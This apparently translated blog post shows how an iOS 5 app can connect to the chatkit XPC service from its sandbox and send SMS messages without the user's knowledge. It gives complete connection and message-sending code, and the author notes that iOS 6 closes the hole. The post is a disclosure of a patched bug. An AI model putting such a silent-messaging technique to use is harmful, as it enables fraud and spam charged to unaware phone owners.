Your flashlight can send SMS: one more reason to upgrade your device to iOS 6

Today I will not tell you how the security system of iOS 5 works. And we will not collect crumbs of information through undocumented features. We will simply send an SMS from the application without the user's knowledge.


')
The network has very little information describing the motility of the low-level work of iOS. These crumbs do not allow to restore the picture as a whole. Many header files have closed source behind them. Most steps have to be done almost blindly. The “mother” of the mobile platform, MacOS X, becomes the main field for experimentation.

One of the interprocess communication systems in MacOS is XPC . This system layer is made for interprocess communication based on the transfer of plist structures using libSystem and launchd. In essence, this is an interface that allows you to manage processes by exchanging structures of the form dictionary. And thanks to the inheritance, iOS 5 also has this mechanism.

You probably already understood what I wanted to say with this introduction. Yes, iOS has system services that have the facilities for XPC interaction. And in my example, I would like to demonstrate the technique of working with the daemon to send SMS messages. However, first of all, you need to say the following: this feature is closed in iOS 6 , but is relevant for iOS 5.0–5.1.1. Jailbreak, Private Framework and other illegal means are not required for its implementation. You only need a set of header files from the / usr / include / xpc / * directory on your MacOS.

In the iOS operating system, one of the elements for sending SMS-messages is the system service com.apple.chatkit, whose tasks include the formation, management and sending of short text messages. For ease of management, it has a public communication port com.apple.chatkit.clientcomposeserver.xpc. Using the XPC subsystem, you can form and send messages without user confirmation.



Well, let's try to create a connection.

xpc_connection_t myconnection; dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT); myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); 

Now we have myconnection XPC connection to the service for sending SMS. However, XPC is designed in such a way that the connection is created in a “frozen” form: to activate it, we will need one more step.

 xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event) { xpc_type_t xtype = xpc_get_type(event); if(XPC_TYPE_ERROR == xtype) { NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); } // Always set an event handler. NSLog(@"Received an message event!"); }); xpc_connection_resume(myconnection); 

We animate the connection. On iOS 6, at this very moment you will see in the phone log a message stating that this kind of interaction is prohibited. Now we need to create a dictionary similar to xpc_dictionary, with the necessary data to send a message.

 NSArray *receipements = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil]; NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:receipements format:200 options:0 error:NULL]; xpc_object_t mydict = xpc_dictionary_create(0, 0, 0); xpc_dictionary_set_int64(mydict, "message-type", 0); xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]); xpc_dictionary_set_string(mydict, "text", "hello from your application!"); 

It remains a bit: send a message to the XPC port and make sure that it is delivered.

 xpc_connection_send_message(myconnection, mydict); xpc_connection_send_barrier(myconnection, ^{ NSLog(@"Message has been successfully delievered"); }); 

The sound of an SMS sent to a short number.
So, until this feature was removed in iOS 6, any application had the ability to send SMS messages without the user's knowledge. In iOS 6, Apple has added an additional security layer that does not allow connecting to this service from the sandbox.

Thanks for attention!